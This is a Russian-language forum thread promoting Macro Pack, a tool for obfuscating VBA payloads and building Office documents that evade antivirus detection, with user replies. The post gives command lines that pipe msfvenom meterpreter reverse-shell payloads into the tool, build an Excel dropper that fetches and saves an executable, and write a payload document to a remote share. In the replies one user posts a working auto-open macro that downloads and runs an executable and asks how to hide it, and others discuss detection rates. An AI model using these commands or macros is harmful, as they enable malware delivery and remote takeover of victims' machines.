Soft MacroPack - Обфускация shellcode

Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.

Вот собственно, Macro Pack:

Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba – полезной нагрузки в окончательный документ Office.

Более подробная информация находится тут:

> sevagas/macro_pack

Особенности:

• Отсутствует необходимость конфигурирования
• Необходимые действия могут быть выполнены одной строкой кода
• Создание Word, Excel и PowerPoint документов

Инструмент совместим с полезными нагрузками, создаваемыми популярными пентест инструментами (Metasploit, Empire, ...). Также легко сочетается с другими утилитами. Этот инструмент написан на Python3 и работает как на платформе Linux, так и на платформе Windows.

Примечание:

Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций

Обфускация:

• Переименование функций
• Переименование переменных
• Удаление пробелов
• Удаление комментариев
• Кодирующие строки

Обратите внимание, что основная цель обфускации Macro Pack заключается не в противодействии обратной инженерии, а в предотвращении обнаружения антивируса.

Установка:

git clone https://github.com/sevagas/macro_pack
cd macro_pack

pip3 install -r requirements.txt

Примечание. Для Windows вам необходимо загрузить вручную pywin32

>

Ссылка скрыта от гостей

Справка:

macro_pack.py  --help

Использование:

Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.

msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba

Обфускация Empire stager vba файла и создание документа MS Word:

macro_pack.py -f empire.vba -o -W myDoc.docm

Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)

echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"

Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:

msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc

Рассмотрим это на небольшом примере:

Обфусцируем VBA от Metasploit:

msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt

msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba

Результат будет таким:

Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.

Спасибо за внимание

 

[akv8]

Тестил данный инструмент, и с obfuscate как то грустно сейчас, документ c макросом msfvenom и meterpreter сразу чекается AV.
На nodistributecom, детектов полно. Pro версию никто не доставал?

 

[jonni_vu]

Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте

 

[Doctor zlo]

Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте

Сегодня поставил все отлично работает. Попробуйте установить pip3 такой командой: sudo apt install python3-pip потом установите зависимости и перейдите в src там будет macro_pack.py

 

[acuntenix]

У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
        
        End Sub

 

[lomini]

У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
      
        End Sub

Что ты добьешься тем что у тебя выполнится патти ?
сессию надо прокидывать метера

 

[Ondrik8]

я чето шеллкода тут не увидел)

если сравнить с этим

а так хотелось узнать, как его действительно можно обфусцировать)

 

[Ondrik8]

вот тут если что SHELLCODE за - Encod-ить можно) ecx86/shellcode_encoder
раз уж тема про него)